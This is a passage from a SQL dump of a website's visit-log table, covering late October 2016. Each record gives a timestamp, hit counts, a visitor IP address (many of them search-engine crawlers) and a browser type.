,1,0,0,'164.132.161.41','other'),(71017,1477612142,1,1,0,0,'163.172.66.113','other'),(71018,1477612227,1,1,0,0,'163.172.66.7','other'),(71019,1477612955,1,1,0,0,'51.255.65.9','other'),(71020,1477613452,1,1,0,0,'51.255.65.14','other'),(71021,1477613600,1,1,0,0,'163.172.65.124','other'),(71022,1477614733,1,1,0,0,'174.129.237.157','other'),(71023,1477614764,1,1,0,0,'180.76.15.147','other'),(71024,1477614794,1,0,1,0,'68.180.230.220',''),(71025,1477614801,1,1,0,0,'163.172.65.247','other'),(71026,1477615176,1,1,0,0,'130.193.50.34','other'),(71027,1477615309,1,1,0,0,'51.255.65.8','other'),(71028,1477615609,1,1,0,0,'164.132.161.38','other'),(71029,1477615693,1,1,0,0,'164.132.161.2','other'),(71030,1477616203,1,1,0,0,'130.193.50.34','other'),(71031,1477616211,1,1,0,0,'163.172.65.210','other'),(71032,1477616428,1,1,0,0,'164.132.161.84','other'),(71033,1477617207,1,1,0,0,'163.172.65.242','other'),(71034,1477617215,1,1,0,0,'163.172.66.54','other'),(71035,1477617645,1,1,0,0,'163.172.65.249','other'),(71036,1477617725,1,1,0,0,'51.255.65.41','other'),(71037,1477617966,1,1,0,0,'163.172.66.157','other'),(71038,1477618102,1,1,0,0,'164.132.161.12','other'),(71039,1477618824,1,1,0,0,'51.255.65.95','other'),(71040,1477619100,1,1,0,0,'51.255.65.92','other'),(71041,1477619145,1,1,0,0,'163.172.66.128','other'),(71042,1477619275,1,1,0,0,'163.172.64.246','other'),(71043,1477620337,1,1,0,0,'163.172.66.53','other'),(71044,1477620575,1,1,0,0,'51.255.65.97','other'),(71045,1477620639,1,1,0,0,'164.132.161.50','other'),(71046,1477620773,1,1,0,0,'163.172.65.110','other'),(71047,1477621511,1,1,0,0,'163.172.66.139','other'),(71048,1477622403,1,1,0,0,'51.255.65.29','other'),(71049,1477622479,1,1,0,0,'164.132.161.64','other'),(71050,1477622657,1,1,0,0,'180.76.15.158','other'),(71051,1477622793,1,1,0,0,'51.255.65.94','other'),(71052,1477623334,1,1,0,0,'164.132.161.45','other'),(71053,1477623425,1,1,0,0,'51.255.65.10','other'),(71054,1477623626,1,1,0,0,'163.172.65.225','other'),(71055,1477623693,1,1,0,0,'66.249.69.149','chrome'),(71056,1477623933,1,1,0,0,'163.172.65.230','other'),(71057,1477624019,1,1,0,0,'163.172.66.107','other'),(71058,1477624244,1,1,0,0,'163.172.65.252','other'),(71059,1477624597,1,1,0,0,'164.132.161.76','other'),(71060,1477624607,1,1,0,0,'173.208.136.114','chrome'),(71061,1477625144,1,1,0,0,'164.132.161.61','other'),(71062,1477625605,1,1,0,0,'217.69.133.222','other'),(71063,1477625910,1,1,0,0,'51.255.65.57','other'),(71064,1477626051,1,1,0,0,'163.172.66.80','other'),(71065,1477626281,1,1,0,0,'66.102.9.27','other'),(71066,1477627224,1,1,0,0,'164.132.161.84','other'),(71067,1477627347,1,1,0,0,'51.255.65.15','other'),(71068,1477628490,1,1,0,0,'174.129.237.157','other'),(71069,1477628705,1,1,0,0,'163.172.66.113','other'),(71070,1477628955,1,1,0,0,'130.193.50.34','other'),(71071,1477629394,1,1,0,0,'163.172.66.35','other'),(71072,1477629839,1,1,0,0,'164.132.161.2','other'),(71073,1477629892,1,1,0,0,'163.172.66.141','other'),(71074,1477629998,1,1,0,0,'130.193.50.34','other'),(71075,1477630079,1,1,0,0,'51.255.65.33','other'),(71076,1477630165,1,1,0,0,'164.132.161.83','other'),(71077,1477630685,1,1,0,0,'164.132.161.9','other'),(71078,1477630761,1,1,0,0,'66.102.9.27','chrome'),(71079,1477631004,1,1,0,0,'66.102.9.25','other'),(71080,1477631238,1,1,0,0,'51.255.65.74','other'),(71081,1477631456,1,1,0,0,'66.249.75.183','chrome'),(71082,1477631634,1,0,1,0,'66.249.76.79',''),(71083,1477631714,1,1,0,0,'164.132.161.48','other'),(71084,1477631727,1,1,0,0,'163.172.64.229','other'),(71085,1477631896,1,1,0,0,'163.172.66.52','other'),(71086,1477632269,1,1,0,0,'51.255.65.73','other'),(71087,1477632303,1,1,0,0,'174.129.237.157','other'),(71088,1477632564,1,1,0,0,'164.132.161.18','other'),(71089,1477632613,1,1,0,0,'163.172.64.251','other'),(71090,1477633373,1,1,0,0,'37.52.175.174','opera'),(71091,1477633397,1,1,0,0,'141.8.142.61','other'),(71092,1477633407,1,1,0,0,'94.179.209.79','firefox'),(71093,1477633422,2,2,0,0,'141.8.183.25','other'),(71094,1477633834,1,1,0,0,'91.124.239.140','chrome'),(71095,1477634052,1,1,0,0,'163.172.66.11','other'),(71096,1477634325,2,2,0,0,'91.196.178.68','chrome'),(71097,1477634394,1,1,0,0,'51.255.65.75','other'),(71098,1477634654,1,1,0,0,'130.193.51.19','other'),(71099,1477634809,1,1,0,0,'91.196.177.46','firefox'),(71100,1477634946,1,1,0,0,'66.102.9.27','other'),(71101,1477635483,1,1,0,0,'163.172.66.145','other'),(71102,1477635616,1,1,0,0,'178.212.239.254','chrome'),(71103,1477635885,1,1,0,0,'91.196.178.67','firefox'),(71104,1477636133,1,1,0,0,'66.249.93.13','chrome'),(71105,1477636777,1,1,0,0,'91.196.178.68','chrome'),(71106,1477637062,1,1,0,0,'195.49.151.89','chrome'),(71107,1477637064,1,1,0,0,'164.132.161.10','other'),(71108,1477637846,1,1,0,0,'164.132.161.63','other'),(71109,1477638248,1,1,0,0,'66.102.9.27','other'),(71110,1477638254,1,1,0,0,'163.172.66.141','other'),(71111,1477638781,1,1,0,0,'163.172.66.48','other'),(71112,1477638838,1,1,0,0,'40.77.167.73','other'),(71113,1477638872,1,1,0,0,'95.132.5.92','firefox'),(71114,1477638927,1,1,0,0,'51.255.65.88','other'),(71115,1477639705,1,1,0,0,'51.255.65.27','other'),(71116,1477639871,1,1,0,0,'91.196.178.72','chrome'),(71117,1477639872,1,1,0,0,'164.132.161.27','other'),(71118,1477640263,1,1,0,0,'164.132.161.44','other'),(71119,1477640306,1,1,0,0,'51.255.65.55','other'),(71120,1477640910,1,1,0,0,'163.172.66.70','other'),(71121,1477641036,1,1,0,0,'164.132.161.30','other'),(71122,1477641101,1,1,0,0,'40.77.167.73','other'),(71123,1477641827,1,1,0,0,'66.102.9.25','other'),(71124,1477642017,1,1,0,0,'91.196.177.15','chrome'),(71125,1477642113,1,1,0,0,'163.172.66.78','other'),(71126,1477642222,1,1,0,0,'164.132.161.83','other'),(71127,1477642387,1,1,0,0,'163.172.65.210','other'),(71128,1477642422,1,1,0,0,'163.172.65.68','other'),(71129,1477642543,1,1,0,0,'164.132.161.70','other'),(71130,1477642646,1,1,0,0,'163.172.66.49','other'),(71131,1477642814,1,1,0,0,'213.108.45.170','chrome'),(71132,1477642881,1,1,0,0,'163.172.66.119','other'),(71133,1477643435,1,1,0,0,'51.255.65.40','other'),(71134,1477643485,1,1,0,0,'163.172.66.39','other'),(71135,1477643567,1,1,0,0,'163.172.66.14','other'),(71136,1477643598,1,1,0,0,'163.172.66.33','other'),(71137,1477643752,1,1,0,0,'130.193.51.19','other'),(71138,1477643753,1,1,0,0,'141.8.183.19','other'),(71139,1477643756,1,1,0,0,'130.193.50.38','other'),(71140,1477643794,1,1,0,0,'164.132.161.27','other'),(71141,1477643851,1,1,0,0,'163.172.66.110','other'),(71142,1477644128,1,1,0,0,'163.172.66.71','other'),(71143,1477644257,1,1,0,0,'163.172.65.15','other'),(71144,1477644371,1,1,0,0,'163.172.66.22','other'),(71145,1477644495,1,1,0,0,'51.255.65.60','other'),(71146,1477644889,1,1,0,0,'163.172.64.231','other'),(71147,1477645007,1,1,0,0,'163.172.64.244','other'),(71148,1477645207,1,1,0,0,'51.255.65.85','other'),(71149,1477645253,1,1,0,0,'66.102.9.25','other'),(71150,1477645344,1,1,0,0,'51.255.65.65','other'),(71151,1477645552,1,1,0,0,'163.172.66.84','other'),(71152,1477645560,1,1,0,0,'141.8.132.41','other'),(71153,1477645997,1,1,0,0,'195.10.210.49','chrome'),(71154,1477646296,1,1,0,0,'91.196.178.67','firefox'),(71155,1477647056,1,1,0,0,'164.132.161.11','other'),(71156,1477647475,1,1,0,0,'130.193.50.34','other'),(71157,1477647923,1,1,0,0,'91.196.178.164','chrome'),(71158,1477647975,1,1,0,0,'164.132.161.52','other'),(71159,1477648075,1,1,0,0,'163.172.66.164','other'),(71160,1477648423,1,1,0,0,'163.172.66.71','other'),(71161,1477648647,1,1,0,0,'163.172.66.52','other'),(71162,1477648958,1,1,0,0,'51.255.65.31','other'),(71163,1477649096,1,1,0,0,'66.102.9.29','other'),(71164,1477649796,1,1,0,0,'164.132.161.57','other'),(71165,1477650298,1,1,0,0,'163.172.66.127','other'),(71166,1477651304,1,1,0,0,'163.172.66.41','other'),(71167,1477651375,1,1,0,0,'91.196.178.135','firefox'),(71168,1477651578,1,1,0,0,'163.172.65.193','other'),(71169,1477652280,1,1,0,0,'51.255.65.33','other'),(71170,1477652705,1,1,0,0,'91.196.178.66','firefox'),(71171,1477652738,1,1,0,0,'66.102.9.29','other'),(71172,1477653046,1,1,0,0,'51.255.65.11','other'),(71173,1477653192,1,1,0,0,'85.198.184.210','chrome'),(71174,1477653334,1,1,0,0,'94.179.48.228','chrome'),(71175,1477653450,1,1,0,0,'163.172.66.61','other'),(71176,1477653867,1,1,0,0,'217.69.133.5','other'),(71177,1477653949,1,1,0,0,'163.172.64.233','other'),(71178,1477654117,1,1,0,0,'163.172.66.166','other'),(71179,1477655163,1,1,0,0,'91.196.178.65','chrome'),(71180,1477656106,1,1,0,0,'91.196.178.67','firefox'),(71181,1477656362,1,1,0,0,'66.102.9.25','other'),(71182,1477656504,1,1,0,0,'163.172.66.102','other'),(71183,1477656520,1,1,0,0,'163.172.65.41','other'),(71184,1477656643,1,1,0,0,'51.255.65.90','other'),(71185,1477657588,1,1,0,0,'51.255.65.86','other'),(71186,1477657787,1,1,0,0,'157.55.39.62','other'),(71187,1477657861,1,1,0,0,'51.255.65.34','other'),(71188,1477658182,1,1,0,0,'164.132.161.71','other'),(71189,1477658677,1,1,0,0,'163.172.65.188','other'),(71190,1477659043,1,1,0,0,'51.255.65.76','other'),(71191,1477659122,1,1,0,0,'37.112.225.238','msie'),(71192,1477659660,1,1,0,0,'163.172.64.235','other'),(71193,1477659781,1,1,0,0,'66.102.9.25','other'),(71194,1477660861,1,1,0,0,'164.132.161.30','other'),(71195,1477661773,1,1,0,0,'164.132.161.52','other'),(71196,1477661991,2,2,0,0,'91.196.177.46','firefox'),(71197,1477662223,1,1,0,0,'164.132.161.77','other'),(71198,1477662529,1,1,0,0,'91.196.177.15','chrome'),(71199,1477662897,1,1,0,0,'51.255.65.79','other'),(71200,1477663777,1,1,0,0,'66.102.9.29','other'),(71201,1477664009,1,1,0,0,'91.196.177.15','chrome'),(71202,1477665017,1,1,0,0,'91.196.178.164','chrome'),(71203,1477666214,1,1,0,0,'164.132.161.83','other'),(71204,1477666374,1,1,0,0,'94.178.154.214','chrome'),(71205,1477666992,1,1,0,0,'163.172.66.132','other'),(71206,1477667285,1,1,0,0,'66.102.9.27','other'),(71207,1477667967,1,1,0,0,'180.76.15.157','other'),(71208,1477668300,1,1,0,0,'163.172.65.61','other'),(71209,1477668466,1,1,0,0,'91.196.178.165','chrome'),(71210,1477668790,1,0,1,0,'68.180.229.190',''),(71211,1477669114,1,1,0,0,'163.172.65.67','other'),(71212,1477670498,1,1,0,0,'130.193.50.34','other'),(71213,1477670732,1,1,0,0,'66.102.9.25','other'),(71214,1477671563,1,1,0,0,'164.132.161.27','other'),(71215,1477671752,1,1,0,0,'164.132.161.63','other'),(71216,1477671807,1,1,0,0,'51.255.65.84','other'),(71217,1477672110,1,1,0,0,'51.255.65.42','other'),(71218,1477673837,1,1,0,0,'51.255.65.14','other'),(71219,1477673916,1,1,0,0,'40.77.167.73','other'),(71220,1477673963,1,1,0,0,'164.132.161.81','other'),(71221,1477674008,1,1,0,0,'94.179.209.79','firefox'),(71222,1477674733,1,1,0,0,'91.196.178.67','firefox'),(71223,1477674829,1,1,0,0,'66.102.9.29','other'),(71224,1477675061,1,1,0,0,'91.196.178.99','chrome'),(71225,1477675702,1,1,0,0,'163.172.66.81','other'),(71226,1477675812,1,1,0,0,'164.132.161.96','other'),(71227,1477676045,1,1,0,0,'130.193.50.34','other'),(71228,1477676075,1,1,0,0,'164.132.161.89','other'),(71229,1477676080,1,1,0,0,'163.172.65.199','other'),(71230,1477676367,1,1,0,0,'164.132.161.60','other'),(71231,1477676583,1,1,0,0,'91.196.178.131','chrome'),(71232,1477676682,1,1,0,0,'163.172.66.39','other'),(71233,1477676785,1,1,0,0,'51.255.65.48','other'),(71234,1477677173,1,1,0,0,'163.172.64.253','other'),(71235,1477677567,1,1,0,0,'164.132.161.53','other'),(71236,1477678228,1,1,0,0,'51.255.65.67','other'),(71237,1477678776,1,1,0,0,'51.255.65.33','other'),(71238,1477678955,1,1,0,0,'164.132.161.64','other'),(71239,1477679062,1,1,0,0,'164.132.161.68','other'),(71240,1477679216,1,1,0,0,'164.132.161.65','other'),(71241,1477679538,1,1,0,0,'163.172.66.156','other'),(71242,1477680511,1,1,0,0,'163.172.65.217','other'),(71243,1477680686,1,1,0,0,'51.255.65.74','other'),(71244,1477681140,1,1,0,0,'66.102.9.25','other'),(71245,1477681463,1,1,0,0,'51.255.65.8','other'),(71246,1477682023,1,1,0,0,'164.132.161.11','other'),(71247,1477682490,1,1,0,0,'46.211.156.95','chrome'),(71248,1477682960,1,1,0,0,'51.255.65.52','other'),(71249,1477683166,1,1,0,0,'163.172.65.213','other'),(71250,1477683855,1,1,0,0,'130.193.50.34','other'),(71251,1477683933,1,1,0,0,'51.255.65.14','other'),(71252,1477684151,1,1,0,0,'163.172.64.237','other'),(71253,1477684545,1,1,0,0,'51.255.65.13','other'),(71254,1477684643,1,1,0,0,'164.132.161.87','other'),(71255,1477684944,1,1,0,0,'66.249.64.24','chrome'),(71256,1477685153,1,1,0,0,'163.172.64.220','other'),(71257,1477685738,1,1,0,0,'163.172.65.20','other'),(71258,1477686079,1,1,0,0,'163.172.65.116','other'),(71259,1477686994,1,1,0,0,'157.55.39.224','other'),(71260,1477687258,1,1,0,0,'164.132.161.51','other'),(71261,1477687380,1,1,0,0,'217.69.133.203','other'),(71262,1477687968,1,1,0,0,'51.255.65.82','other'),(71263,1477688476,1,1,0,0,'51.255.65.92','other'),(71264,1477688536,1,1,0,0,'163.172.65.125','other'),(71265,1477688791,1,1,0,0,'164.132.161.92','other'),(71266,1477688818,1,1,0,0,'180.76.15.153','other'),(71267,1477689261,1,1,0,0,'51.255.65.18','other'),(71268,1477690893,1,1,0,0,'157.55.39.224','other'),(71269,1477691393,1,1,0,0,'51.255.65.96','other'),(71270,1477692037,1,1,0,0,'164.132.161.90','other'),(71271,1477692364,1,1,0,0,'51.255.65.14','other'),(71272,1477692813,1,1,0,0,'163.172.65.251','other'),(71273,1477692972,1,1,0,0,'157.55.39.124','other'),(71274,1477693306,1,1,0,0,'164.132.161.27','other'),(71275,1477693662,1,1,0,0,'66.102.9.27','other'),(71276,1477694107,1,1,0,0,'23.92.212.2','chrome'),(71277,1477694710,1,1,0,0,'91.196.178.37','chrome'),(71278,1477695010,1,1,0,0,'51.255.65.72','other'),(71279,1477696075,1,1,0,0,'51.255.65.63','other'),(71280,1477696177,1,1,0,0,'51.255.65.88','other'),(71281,1477696653,1,1,0,0,'163.172.65.37','other'),(71282,1477698216,1,1,0,0,'163.172.66.119','other'),(71283,1477698824,1,1,0,0,'51.255.65.64','other'),(71284,1477699251,1,1,0,0,'164.132.161.8','other'),(71285,1477699685,1,1,0,0,'163.172.65.203','other'),(71286,1477700091,1,1,0,0,'164.132.161.52','other'),(71287,1477700373,1,1,0,0,'163.172.64.249','other'),(71288,1477700673,1,1,0,0,'163.172.65.239','other'),(71289,1477701403,1,1,0,0,'157.55.39.124','other'),(71290,1477702013,1,1,0,0,'51.255.65.16','other'),(71291,1477702447,1,1,0,0,'163.172.66.179','other'),(71292,1477702584,1,1,0,0,'180.76.15.142','other'),(71293,1477702903,1,1,0,0,'51.255.65.38','other'),(71294,1477703192,1,1,0,0,'163.172.66.154','other'),(71295,1477703764,1,1,0,0,'163.172.66.81','other'),(71296,1477703906,1,1,0,0,'51.255.65.57','other'),(71297,1477704156,1,1,0,0,'164.132.161.65','other'),(71298,1477704335,1,1,0,0,'163.172.66.144','other'),(71299,1477704481,1,1,0,0,'163.172.65.200','other'),(71300,1477704563,1,1,0,0,'163.172.66.30','other'),(71301,1477704742,1,1,0,0,'164.132.161.69','other'),(71302,1477704965,1,1,0,0,'164.132.161.53','other'),(71303,1477705442,1,1,0,0,'164.132.161.49','other'),(71304,1477706132,1,1,0,0,'163.172.64.225','other'),(71305,1477706307,1,1,0,0,'51.255.65.13','other'),(71306,1477707040,1,1,0,0,'130.193.50.38','other'),(71307,1477707221,1,1,0,0,'51.255.65.60','other'),(71308,1477707900,1,1,0,0,'51.255.65.55','other'),(71309,1477708169,1,1,0,0,'163.172.65.30','other'),(71310,1477708872,1,1,0,0,'164.132.161.63','other'),(71311,1477709035,1,1,0,0,'163.172.66.141','other'),(71312,1477710100,1,1,0,0,'164.132.161.94','other'),(71313,1477710308,1,1,0,0,'163.172.66.19','other'),(71314,1477710540,1,1,0,0,'51.255.65.26','other'),(71315,1477710816,1,1,0,0,'164.132.161.70','other'),(71316,1477711002,1,1,0,0,'164.132.161.52','other'),(71317,1477711813,1,1,0,0,'66.102.9.29','other'),(71318,1477711921,1,1,0,0,'164.132.161.11','other'),(71319,1477712465,1,1,0,0,'164.132.161.86','other'),(71320,1477712736,1,1,0,0,'51.255.65.3','other'),(71321,1477712806,1,1,0,0,'51.255.65.12','other'),(71322,1477712890,1,1,0,0,'180.76.15.18','other'),(71323,1477713389,1,1,0,0,'164.132.161.70','other'),(71324,1477713622,1,1,0,0,'163.172.66.153','other'),(71325,1477713631,1,1,0,0,'51.255.65.61','other'),(71326,1477713862,1,1,0,0,'66.102.9.27','other'),(71327,1477714088,1,1,0,0,'51.255.65.97','other'),(71328,1477714109,1,1,0,0,'163.172.65.248','other'),(71329,1477714202,6,6,0,0,'5.9.89.175','other'),(71330,1477714213,6,6,0,0,'5.9.8.150','other'),(71331,1477714663,1,1,0,0,'163.172.65.242','other'),(71332,1477714983,1,1,0,0,'164.132.161.29','other'),(71333,1477716855,1,1,0,0,'164.132.161.57','other'),(71334,1477717446,1,1,0,0,'163.172.66.139','other'),(71335,1477717565,1,1,0,0,'164.132.161.84','other'),(71336,1477717584,1,1,0,0,'164.132.161.45','other'),(71337,1477718264,1,1,0,0,'163.172.66.111','other'),(71338,1477718293,1,1,0,0,'66.102.9.29','other'),(71339,1477718372,1,1,0,0,'164.132.161.10','other'),(71340,1477718763,1,1,0,0,'164.132.161.27','other'),(71341,1477718778,1,1,0,0,'141.8.183.25','other'),(71342,1477718892,1,1,0,0,'51.255.65.45','other'),(71343,1477718943,1,1,0,0,'51.255.65.82','other'),(71344,1477719175,1,1,0,0,'51.255.65.22','other'),(71345,1477719187,1,1,0,0,'163.172.66.55','other'),(71346,1477719991,1,1,0,0,'51.255.65.47','other'),(71347,1477720597,1,1,0,0,'163.172.66.168','other'),(71348,1477720866,1,1,0,0,'163.172.66.8','other'),(71349,1477721058,32,32,0,0,'62.210.97.48','other'),(71350,1477721328,1,1,0,0,'51.255.65.57','other'),(71351,1477721613,1,1,0,0,'51.255.65.80','other'),(71352,1477721944,1,1,0,0,'51.255.65.38','other'),(71353,1477722184,1,1,0,0,'163.172.65.55','other'),(71354,1477722218,1,1,0,0,'163.172.65.127','other'),(71355,1477722305,1,1,0,0,'163.172.65.2','other'),(71356,1477722405,1,1,0,0,'51.255.65.95','other'),(71357,1477722437,1,1,0,0,'51.255.65.35','other'),(71358,1477722974,2,2,0,0,'95.213.141.126','opera'),(71359,1477723264,1,1,0,0,'51.255.65.50','other'),(71360,1477723400,1,1,0,0,'163.172.65.216','other'),(71361,1477723463,1,1,0,0,'164.132.161.57','other'),(71362,1477723908,1,1,0,0,'51.255.65.95','other'),(71363,1477724044,1,1,0,0,'141.8.183.25','other'),(71364,1477724475,1,1,0,0,'164.132.161.97','other'),(71365,1477724487,1,1,0,0,'51.255.65.57','other'),(71366,1477724728,1,1,0,0,'66.102.9.27','other'),(71367,1477724741,1,1,0,0,'94.179.209.79','firefox'),(71368,1477724990,1,1,0,0,'163.172.66.28','other'),(71369,1477725017,1,1,0,0,'163.172.66.133','other'),(71370,1477725261,1,1,0,0,'51.255.65.58','other'),(71371,1477725676,1,1,0,0,'163.172.65.188','other'),(71372,1477725783,1,1,0,0,'163.172.65.198','other'),(71373,1477725800,1,1,0,0,'66.249.93.14','chrome'),(71374,1477725829,1,1,0,0,'180.76.15.155','other'),(71375,1477726317,1,1,0,0,'51.255.65.39','other'),(71376,1477726818,1,1,0,0,'51.255.65.89','other'),(71377,1477727003,1,1,0,0,'51.255.65.59','other'),(71378,1477727089,1,1,0,0,'164.132.161.20','other'),(71379,1477727937,1,1,0,0,'130.193.50.34','other'),(71380,1477728687,1,1,0,0,'164.132.161.28','other'),(71381,1477729682,1,1,0,0,'141.8.183.25','other'),(71382,1477730033,1,1,0,0,'164.132.161.54','other'),(71383,1477730485,1,1,0,0,'51.255.65.80','other'),(71384,1477730612,1,1,0,0,'163.172.66.114','other'),(71385,1477730654,1,1,0,0,'163.172.65.39','other'),(71386,1477730685,1,1,0,0,'163.172.66.31','other'),(71387,1477731096,1,1,0,0,'130.193.51.19','other'),(71388,1477731201,1,1,0,0,'157.55.39.9','other'),(71389,1477731270,1,1,0,0,'130.193.50.38','other'),(71390,1477731497,1,1,0,0,'164.132.161.32','other'),(71391,1477731520,1,1,0,0,'51.255.65.5','other'),(71392,1477731960,1,1,0,0,'164.132.161.16','other'),(71393,1477732141,1,1,0,0,'164.132.161.77','other'),(71394,1477732236,1,1,0,0,'51.255.65.84','other'),(71395,1477732252,2,2,0,0,'130.193.50.34','other'),(71396,1477732539,1,1,0,0,'51.255.65.85','other'),(71397,1477732626,1,1,0,0,'51.255.65.19','other'),(71398,1477732898,1,1,0,0,'94.179.209.79','firefox'),(71399,1477732979,1,1,0,0,'164.132.161.82','other'),(71400,1477733535,1,1,0,0,'207.46.13.8','other'),(71401,1477733966,2,2,0,0,'130.193.50.34','other'),(71402,1477735426,1,1,0,0,'163.172.65.6','other'),(71403,1477736214,1,1,0,0,'66.102.9.25','other'),(71404,1477736334,1,1,0,0,'94.179.209.79','firefox'),(71405,1477736837,1,1,0,0,'163.172.66.168','other'),(71406,1477737303,1,1,0,0,'164.132.161.56','other'),(71407,1477737583,1,1,0,0,'66.249.64.21','chrome'),(71408,1477737703,1,1,0,0,'164.132.161.36','other'),(71409,1477737745,1,1,0,0,'141.8.183.25','other'),(71410,1477737998,1,1,0,0,'163.172.65.216','other'),(71411,1477739014,1,1,0,0,'141.8.183.25','other'),(71412,1477739381,1,1,0,0,'163.172.66.16','other'),(71413,1477739473,1,1,0,0,'164.132.161.25','other'),(71414,1477739486,1,1,0,0,'66.102.9.27','other'),(71415,1477739503,1,1,0,0,'163.172.66.60','other'),(71416,1477739888,1,1,0,0,'164.132.161.36','other'),(71417,1477739898,1,1,0,0,'51.255.65.71','other'),(71418,1477740396,1,1,0,0,'51.255.65.77','other'),(71419,1477740731,1,1,0,0,'51.255.65.63','other'),(71420,1477740805,1,1,0,0,'51.255.65.49','other'),(71421,1477741361,1,1,0,0,'163.172.64.187','other'),(71422,1477741621,1,1,0,0,'163.172.66.159','other'),(71423,1477741741,1,1,0,0,'94.179.209.79','firefox'),(71424,1477741763,2,2,0,0,'130.193.50.34','other'),(71425,1477741883,1,1,0,0,'141.8.183.25','other'),(71426,1477743093,1,1,0,0,'66.102.9.25','other'),(71427,1477743435,1,1,0,0,'51.255.65.81','other'),(71428,1477744326,1,1,0,0,'130.193.50.34','other'),(71429,1477744537,1,1,0,0,'207.46.13.9','other'),(71430,1477744558,1,1,0,0,'163.172.65.214','other'),(71431,1477745278,1,1,0,0,'51.255.65.9','other'),(71432,1477745334,1,1,0,0,'51.255.65.2','other'),(71433,1477745381,1,1,0,0,'164.132.161.35','other'),(71434,1477745423,1,1,0,0,'164.132.161.25','other'),(71435,1477745432,1,1,0,0,'141.8.183.25','other'),(71436,1477745546,2,2,0,0,'130.193.50.34','other'),(71437,1477745758,2,2,0,0,'91.196.178.38','msie'),(71438,1477746325,1,1,0,0,'66.102.9.25','other'),(71439,1477746642,1,1,0,0,'51.255.65.3','other'),(71440,1477747762,1,1,0,0,'141.8.183.25','other'),(71441,1477748231,1,1,0,0,'130.193.50.34','other'),(71442,1477748410,1,1,0,0,'130.180.217.88','chrome'),(71443,1477748477,1,1,0,0,'163.172.65.24','other'),(71444,1477748912,1,0,1,0,'68.180.230.220',''),(71445,1477749356,1,1,0,0,'141.8.183.25','other'),(71446,1477749796,1,1,0,0,'51.255.65.3','other'),(71447,1477750024,1,1,0,0,'163.172.65.210','other'),(71448,1477750359,1,1,0,0,'51.255.65.9','other'),(71449,1477750588,1,1,0,0,'51.255.65.71','other'),(71450,1477750622,1,1,0,0,'66.102.9.27','other'),(71451,1477750838,1,1,0,0,'163.172.66.56','other'),(71452,1477751046,1,1,0,0,'130.193.50.34','other'),(71453,1477751400,1,1,0,0,'51.255.65.38','other'),(71454,1477752086,1,1,0,0,'51.255.65.6','other'),(71455,1477752490,1,1,0,0,'141.8.183.25','other'),(71456,1477752615,1,1,0,0,'51.255.65.66','other'),(71457,1477752855,1,1,0,0,'164.132.161.14','other'),(71458,1477753455,1,1,0,0,'51.255.65.91','other'),(71459,1477753668,1,1,0,0,'94.179.209.79','firefox'),(71460,1477754290,1,1,0,0,'51.255.65.64','other'),(71461,1477754507,1,1,0,0,'164.132.161.22','other'),(71462,1477754938,2,2,0,0,'141.8.183.25','other'),(71463,1477755029,1,1,0,0,'163.172.66.131','other'),(71464,1477755505,1,1,0,0,'163.172.66.4','other'),(71465,1477755645,1,1,0,0,'66.102.9.25','other'),(71466,1477756422,1,1,0,0,'130.193.50.34','other'),(71467,1477756966,1,1,0,0,'51.255.65.6','other'),(71468,1477757234,1,1,0,0,'163.172.64.245','other'),(71469,1477757336,1,1,0,0,'66.249.64.27','chrome'),(71470,1477757408,1,1,0,0,'66.249.64.74','chrome'),(71471,1477758136,1,1,0,0,'91.196.178.65','firefox'),(71472,1477759025,1,1,0,0,'164.132.161.62','other'),(71473,1477759689,1,1,0,0,'66.102.9.29','other'),(71474,1477760011,1,1,0,0,'77.88.251.171','chrome'),(71475,1477760150,1,1,0,0,'66.249.64.27','chrome'),(71476,1477760509,1,1,0,0,'130.193.50.34','other'),(71477,1477760524,1,1,0,0,'66.249.64.69','chrome'),(71478,1477761099,1,1,0,0,'207.46.13.9','other'),(71479,1477761618,1,1,0,0,'66.249.64.69','chrome'),(71480,1477761799,1,1,0,0,'164.132.161.60','other'),(71481,1477761990,1,1,0,0,'141.8.183.25','other'),(71482,1477762143,1,1,0,0,'163.172.65.3','other'),(71483,1477762172,1,1,0,0,'51.255.65.52','other'),(71484,1477762474,1,1,0,0,'164.132.161.24','other'),(71485,1477762572,1,1,0,0,'51.255.65.3','other'),(71486,1477762779,1,1,0,0,'130.193.50.34','other'),(71487,1477763404,1,1,0,0,'164.132.161.45','other'),(71488,1477763692,1,1,0,0,'51.255.65.65','other'),(71489,1477764006,1,0,1,0,'68.180.230.220',''),(71490,1477764182,2,1,1,0,'62.210.83.88',''),(71491,1477764532,1,1,0,0,'164.132.161.93','other'),(71492,1477764549,1,1,0,0,'66.102.9.29','other'),(71493,1477764786,1,1,0,0,'164.132.161.31','other'),(71494,1477765333,1,1,0,0,'163.172.66.178','other'),(71495,1477766406,1,1,0,0,'91.196.178.97','chrome'),(71496,1477766505,1,1,0,0,'130.193.50.34','other'),(71497,1477767302,1,1,0,0,'164.132.161.80','other'),(71498,1477767490,1,1,0,0,'163.172.65.242','other'),(71499,1477768117,1,1,0,0,'66.102.9.27','other'),(71500,1477768235,1,1,0,0,'163.172.66.56','other'),(71501,1477768341,1,1,0,0,'157.55.39.27','other'),(71502,1477768479,1,1,0,0,'51.255.65.7','other'),(71503,1477768562,1,1,0,0,'51.255.65.39','other'),(71504,1477768750,1,1,0,0,'94.179.19.18','firefox'),(71505,1477769410,1,1,0,0,'163.172.65.17','other'),(71506,1477769510,1,1,0,0,'164.132.161.75','other'),(71507,1477769602,1,1,0,0,'207.46.13.8','other'),(71508,1477769892,1,1,0,0,'141.8.183.25','other'),(71509,1477771465,1,1,0,0,'51.255.65.66','other'),(71510,1477771664,1,1,0,0,'130.193.50.34','other'),(71511,1477771780,1,1,0,0,'66.102.9.27','other'),(71512,1477772997,1,1,0,0,'51.255.65.70','other'),(71513,1477773064,1,1,0,0,'51.255.65.55','other'),(71514,1477773586,1,1,0,0,'51.255.65.26','other'),(71515,1477774181,1,1,0,0,'164.132.161.79','other'),(71516,1477774215,1,1,0,0,'141.8.183.25','other'),(71517,1477775380,1,1,0,0,'66.102.9.27','other'),(71518,1477776846,1,1,0,0,'130.193.50.34','other'),(71519,1477778122,1,1,0,0,'157.55.39.27','other'),(71520,1477779007,1,1,0,0,'163.172.66.122','other'),(71521,1477779800,1,1,0,0,'164.132.161.59','other'),(71522,1477780776,1,1,0,0,'163.172.66.165','other'),(71523,1477780829,1,1,0,0,'51.255.65.37','other'),(71524,1477780885,1,1,0,0,'51.255.65.12','other'),(71525,1477782616,1,1,0,0,'163.172.64.226','other'),(71526,1477783613,1,1,0,0,'164.132.161.56','other'),(71527,1477783684,1,1,0,0,'163.172.64.189','other'),(71528,1477783931,1,1,0,0,'157.55.39.22','other'),(71529,1477784219,1,1,0,0,'163.1